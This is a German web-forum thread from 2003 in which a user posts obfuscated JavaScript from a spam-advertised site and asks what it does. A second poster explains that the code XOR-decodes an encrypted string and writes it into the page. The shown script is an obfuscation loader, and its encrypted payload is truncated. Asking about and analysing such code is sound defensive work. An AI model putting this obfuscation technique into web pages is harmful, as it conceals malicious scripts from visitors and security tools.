[GastForen Programmierung/Entwicklung JavaScript Spam mit eigener Domain

  • Suche
  • Hilfe
  • Lesezeichen
  • Benutzerliste
Themen
Beiträge
Moderatoren
Letzter Beitrag

Spam mit eigener Domain

Wolfgang Reszel
Beiträge gesamt: 4170

19. Mai 2003, 15:18
Beitrag # 1 von 2
Bewertung:
(540 mal gelesen)
URL zum Beitrag
Beitrag als Lesezeichen
Hi,

gerade erhielt ich folgende Mail:

------------------------------------------------
heyTeklimgb,

sagmalistdiehomepagehiervondir?

http://www.Teklimgb-online.com <<< ACHTUNG JAVASCRIPT, Wolfgang
kammiretwaskomischvor-istabersehrlustig:o))

gruss,
Michaela
-----------------------------------------------

Teklimgb schreibe ich häufig in Gästebüchern rein, also wird wohl eine Robot die Adresse gesammelt haben. Nun habe ich nicht ganz aufgepasst und die Seite gestartet. In Opera wurde nur etwas Quelltext angezeigt, deswegen ging ich in den Explorer, welcher dann eine Fehlerseite anzeigte. Nun habe ich das dumpfe Gefühl, dass die Fehlerseite absicht war und das Javascript trotzdem ausgeführt wurde. Kann mir jemand sagen was folgendes Javascript wohl bewirkt? Falls nicht, bitte ich um die Verschiebung dieses Themas in das Javascript-Forum.

Ich habe mal einige Zeichen (%20%2d etc) im Script ersetzt, damit es lesbar wird. Und sicherheitshalber den Links nicht anklicken, sondern mit Speicher unter... auf Platte ziehen.

<html>
<script language = "JavaScript">
var x = '';
x+='<script language = "JavaScript">
function d (t, k) { var y = 0;
var r = '';
t = unescape (t);
for (i = 0;
i < t.length;
i++) { x = k.charCodeAt(y);
x2 = t.charCo';
x+='deAt(i);
if (x != x2) { r = r + String.fromCharCode (x2 ^ x);
}
else { r = r + String.fromCharCode (x);
}
y++;
if (y == k.length) { y = 0;
}
}
return (e';
x+='scape (r));
}
function nqlpx3mwu26s3g (w, k) { document.write (unescape (d (w, k)));
}
var k='2288007790';
</script>
';
document.write (unescape (x));
nqlpx3mwu26s3g('%0EA%5BJY%40C%17UQ%5CUMYWU%17%0A%19%12xSNY...

<<<##<<< jetzt kommt ganz viel Kauderwelsch >>>##>>>

...%0A%1EU%5CPO%0C=2%08%19YC^X%08%3F%3A', k);

</script>
</html>


Wolfgang
X

Spam mit eigener Domain

Markus Walker
Beiträge gesamt: 494

20. Mai 2003, 23:34
Beitrag # 2 von 2
Beitrag ID: #36165
Bewertung:
(540 mal gelesen)
URL zum Beitrag
Beitrag als Lesezeichen
Da wurde Code verschlüsselt, welcher mit diesen Funktionen wieder entschlüsselt wird. Die Verschlüsselung ist dabei zweistufig. Die Funktion «d» erzeugt den String «r» mit dem Schlüssel «k». Den Input liefert das genannte Kauderwelsch (verschlüsselter Code).
Die ganzen «escape()» und «unescape()» wandeln Satzzeicen, Leerschläge usw. in die zugehörigen Escape-Sequenzen (% und zweistelliger Hex-Wert) hin respektive zurück.
Um an das eigentliche JavaScript zu gelangen, müsste man das Kauderwelsch gemäss dem obigen Script entschlüsseln.


als Antwort auf: [#35874]